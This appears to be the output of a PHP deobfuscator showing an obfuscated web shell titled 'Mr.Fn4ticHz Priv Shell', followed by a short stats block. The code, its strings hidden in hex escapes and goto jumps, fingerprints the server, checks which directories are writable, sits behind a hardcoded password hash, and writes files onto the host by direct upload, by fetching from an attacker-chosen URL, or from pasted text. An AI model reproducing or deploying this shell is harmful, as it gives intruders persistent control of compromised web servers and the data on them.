nd8IQ: function red($text) { echo "\74\143\145\156\164\145\x72\x3e\74\x66\x6f\x6e\x74\40\x63\157\154\x6f\162\x3d\x27\x72\x65\144\x27\x3e" . $text . "\x3c\x2f\143\x65\156\164\145\x72\76\x3c\57\x66\157\x6e\164\x3e"; } goto mslau; kMFHF: echo "\x53\171\x73\x74\x65\155\40\x3a\40\74\x66\157\156\x74\40\x63\x6f\x6c\157\162\x3d\47\x67\157\154\144\x27\x3e" . php_uname() . "\74\x2f\146\157\156\x74\76\74\x62\162\76"; goto meCrJ; Yap8Y: if (function_exists("\x6d\x79\163\161\154\x5f\x63\157\156\156\x65\143\164")) { echo "\x3c\146\x6f\x6e\164\40\x63\157\154\157\162\75\x67\x72\145\x65\x6e\76\117\116\x3c\57\x66\157\156\x74\76"; } else { echo "\x3c\146\157\x6e\164\40\x63\157\154\x6f\x72\x3d\x72\x65\x64\76\x4f\106\x46\x3c\57\x66\x6f\156\164\x3e"; } goto JF3zr; USeK6: echo "\x3c\142\x72\x3e\x44\151\x72\x65\x63\164\157\162\171\40\50" . cekwrite($lokasi) . "\x29\40\72\40\x26\156\142\163\x70\x3b"; goto buKHP; CUJtY: echo "\74\x74\141\x62\x6c\x65\x20\167\151\144\x74\x68\75\42\61\x30\x30\x25\x22\x20\142\157\162\x64\x65\162\x3d\x22\x30\x22\40\143\x65\x6c\x6c\160\141\x64\x64\151\156\147\75\42\x33\42\x20\143\x65\154\x6c\163\160\x61\143\151\x6e\x67\75\42\61\x22\x20\x61\x6c\151\x67\x6e\75\42\143\x65\156\x74\x65\x72\x22\76"; goto vDWV5; k2cWF: function cekwrite($lokasi) { $izin = substr(sprintf("\x25\x6f", fileperms($lokasi)), -4); if (is_writable($lokasi)) { return "\x3c\146\157\156\x74\x20\143\157\154\x6f\162\x3d\147\162\145\x65\x6e\x3e" . $izin . "\x3c\x2f\146\157\x6e\164\x3e"; } else { return "\74\146\x6f\x6e\x74\40\143\x6f\154\157\162\x3d\x72\145\x64\76" . $izin . "\x3c\x2f\x66\157\156\x74\x3e"; } } goto EJnsN; ZeZ3O: function cekroot() { if (is_writable($_SERVER["\104\117\103\x55\115\105\x4e\x54\137\122\117\x4f\124"])) { return "\74\x66\157\156\164\x20\x63\x6f\x6c\x6f\x72\75\x27\x67\x72\145\x65\156\47\x3e\127\x72\151\164\x65\x61\142\x6c\x65\74\57\x66\x6f\156\164\x3e"; } else { return "\74\x66\157\156\164\40\143\x6f\x6c\157\x72\75\47\162\x65\x64\47\76\x57\162\x69\x74\145\x61\142\154\145\74\x2f\146\157\x6e\x74\x3e"; } } goto pNpWp; dDAb5: if (empty($disfunc)) { $disf = "\x3c\146\x6f\x6e\x74\x20\143\x6f\x6c\x6f\x72\75\47\147\x6f\x6c\x64\x27\76\116\x4f\116\x45\74\x2f\x66\157\156\x74\76"; } else { $disf = "\x3c\146\157\156\x74\x20\143\157\154\157\162\x3d\x27\162\x65\144\x27\x3e" . $disfunc . "\x3c\x2f\x66\157\x6e\x74\x3e"; } goto NYuaR; g4KB2: echo "\104\x69\163\141\x62\154\145\40\x46\165\156\x63\x74\151\157\156\x20\72\40" . $disf . "\74\57\146\x6f\x6e\x74\76\x3c\x62\x72\x3e"; goto E1TvY; TCt3B: echo "\x50\x48\120\40\x56\x65\x72\163\x69\x6f\x6e\40\x3a\x20\x3c\146\157\x6e\x74\x20\x63\157\x6c\x6f\162\x3d\x27\147\x6f\x6c\144\47\x3e" . @phpversion() . "\x3c\57\x66\x6f\156\x74\x3e\74\x62\162\x3e"; goto g4KB2; yorHi: if (isset($_POST["\165\x70\x77\153\167\153"])) { if ($_POST["\144\151\162\156\171\x61"] == "\x32") { $lokasi = $_SERVER["\x44\117\103\x55\115\x45\116\124\x5f\122\x4f\117\124"]; } if (isset($_POST["\142\145\x72\153\141\x73\x6e\x79\x61"])) { $data = @file_put_contents($lokasi . "\57" . $_FILES["\x62\145\162\153\x61\x73"]["\x6e\x61\x6d\145"], @file_get_contents($_FILES["\x62\x65\162\153\141\163"]["\164\155\160\x5f\156\x61\x6d\145"])); if (file_exists($lokasi . "\57" . $_FILES["\x62\x65\162\x6b\x61\163"]["\x6e\x61\155\x65"])) { echo "\x46\x69\x6c\x65\40\x55\160\x6c\157\141\144\145\144\x20\41\40\46\156\142\163\x70\73\x3c\146\x6f\156\x74\x20\x63\157\x6c\x6f\162\x3d\x27\x67\x6f\x6c\x64\47\76\74\x69\76" . $lokasi . "\x2f" . $_FILES["\142\145\x72\x6b\x61\163"]["\x6e\x61\x6d\x65"] . "\x3c\57\151\76\x3c\57\x66\x6f\x6e\x74\x3e\74\x62\162\x3e\x3c\x62\162\76"; } else { echo "\74\146\157\x6e\x74\40\143\x6f\154\157\x72\x3d\x27\x72\x65\x64\47\x3e\106\141\x69\154\145\x64\x20\164\157\40\x55\160\154\x6f\x61\x64\x20\41\74\x62\x72\x3e\x3c\142\x72\x3e"; } } elseif (isset($_POST["\x6c\151\156\x6b\156\171\141"])) { if (empty($_POST["\156\141\x6d\141\x6c\151\156\153"])) { die("\x46\151\154\x65\156\141\x6d\x65\x20\143\x61\156\x6e\157\x74\x20\x62\x65\40\145\x6d\x70\164\x79\x20\x21"); } if ($_POST["\144\151\162\x6e\x79\141"] == "\x32") { $lokasi = $_SERVER["\104\x4f\103\x55\x4d\105\x4e\124\137\122\117\117\x54"]; } $data = @file_put_contents($lokasi . "\x2f" . $_POST["\x6e\x61\155\141\154\151\156\x6b"], @file_get_contents($_POST["\144\141\162\x69\154\151\x6e\153"])); if (file_exists($lokasi . "\x2f" . $_POST["\156\x61\x6d\141\x6c\x69\156\x6b"])) { echo "\x46\151\154\x65\40\x55\x70\x6c\157\x61\x64\x65\144\40\x21\40\x26\x6e\142\x73\160\73\74\x66\x6f\x6e\164\40\x63\x6f\154\157\x72\x3d\x27\147\x6f\x6c\144\x27\76\x3c\x69\76" . $lokasi . "\57" . $_POST["\156\x61\155\141\x6c\x69\x6e\153"] . "\x3c\57\x69\x3e\74\x2f\x66\x6f\x6e\x74\x3e\x3c\x62\x72\x3e\x3c\142\162\76"; } else { echo "\x3c\146\x6f\x6e\x74\x20\x63\x6f\154\157\145\75\47\162\145\144\x27\x3e\x46\x61\x69\154\x65\x64\40\164\157\x20\125\x70\154\157\141\x64\x20\x21\x3c\x62\162\x3e\74\142\x72\x3e"; } } elseif (isset($_POST["\142\145\160\x61\163"])) { $bepasdata = $_POST["\142\x65\x70\x61\163\x64\x61\164\x61"]; $bepasnama = $_POST["\142\145\160\141\163\x6e\x61\x6d\x61"]; if ($bepasdata) { echo "\x73\x74\x72\x69\156\147"; } @file_put_contents($lokasi . "\57" . $bepasnama, $bepasdata); if (file_exists($lokasi . "\57" . $bepasnama)) { echo "\106\x69\x6c\x65\40\125\x70\154\x6f\x61\x64\x65\x64\40\41\x20\x26\156\x62\x73\160\x3b\x3c\146\157\x6e\x74\40\143\x6f\154\157\x72\75\47\x67\157\154\x64\x27\x3e\x3c\151\x3e" . $lokasi . "\x2f" . $bepasnama . "\74\x2f\151\76\74\57\x66\x6f\156\164\76\x3c\142\x72\x3e\x3c\x62\162\76"; } else { echo "\74\x66\x6f\156\164\40\x63\x6f\154\157\x65\x3d\47\162\145\144\x27\76\106\x61\151\x6c\x65\x64\40\164\x6f\40\x55\160\154\157\x61\x64\40\x21\x3c\x62\162\76\x3c\x62\x72\x3e"; } } } goto uVFpZ; ueeLG: if (!empty($auth_pass)) { if (isset($_POST["\x70\x61\163\x73"]) && md5($_POST["\160\141\163\163"]) == $auth_pass) { VEsetcookie(md5($_SERVER["\110\124\x54\x50\x5f\x48\x4f\123\124"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["\x48\124\124\x50\x5f\x48\117\123\x54"])]) || $_COOKIE[md5($_SERVER["\x48\x54\x54\120\x5f\110\117\123\x54"])] != $auth_pass) { Login(); } } goto nGGIL; cb5YG: $auth_pass = "\x64\145\145\61\67\x38\x38\x37\x32\x35\x34\x35\63\x31\144\x33\x33\143\60\63\x64\70\x31\60\x64\63\x63\x39\63\65\67\143"; goto tQnrH; ImT0G: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto ZxXnd; sdIcB: if (function_exists("\x63\x75\x72\x6c\x5f\151\x6e\151\164")) { echo "\74\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\x3d\147\x72\x65\145\x6e\x3e\117\x4e\x3c\57\146\x6f\156\x74\x3e"; } else { echo "\74\146\x6f\x6e\x74\40\x63\157\154\x6f\x72\75\162\145\x64\76\x4f\106\x46\74\x2f\x66\157\156\x74\76"; } goto YHZQU; nGGIL: ?>
<!doctypehtml><html><head><title>Mr.Fn4ticHz Priv Shell</title><meta content="Mr.Fn4ticHz"name="author"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="Crushed Is Batter Than Fixing"name="description"><meta content="Crushed Is Batter Than Fixing"property="og:description"><meta content="https://bbx-host.pw/bbr.jpg"property="og:image"><meta content="noindex"name="robots"><meta content="noindex"name="googlebot"><meta content="#1f1f1f"name="theme-color"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href=""rel="stylesheet"type="text/css"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);body{font-family:Dosis,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#25383c}#content .first:hover{background-color:#25383c text-shadow:0px 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed;word-break:break-all}textarea{max-width:95%;max-height:100%;resize:none;outline:0;overflow:auto;background:0 0;color:#fff}textarea::-webkit-scrollbar{width:12px}textarea::-webkit-scrollbar-track{background:#1f1f1f}textarea::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}a{color:#fff;text-decoration:none}a:hover{color:gold;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><script>function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }

async function loadFile(file) {
    let text = await file.text();
    document.getElementById("bepasdata").innerHTML = text;
}</script><center><font face="Bungee"size="5">Mr.Fn4ticHz Priv Shell</font></center><table align="center"border="0"cellpadding="3"cellspacing="1"width="100%"><tr><td><?php  goto U1usa; pMTRG: ?>

Function Calls

None

Variables

None

Stats

MD5 2883fac6d83448193d5cc37bdcc6614a
Eval Count 0
Decode Time 112 ms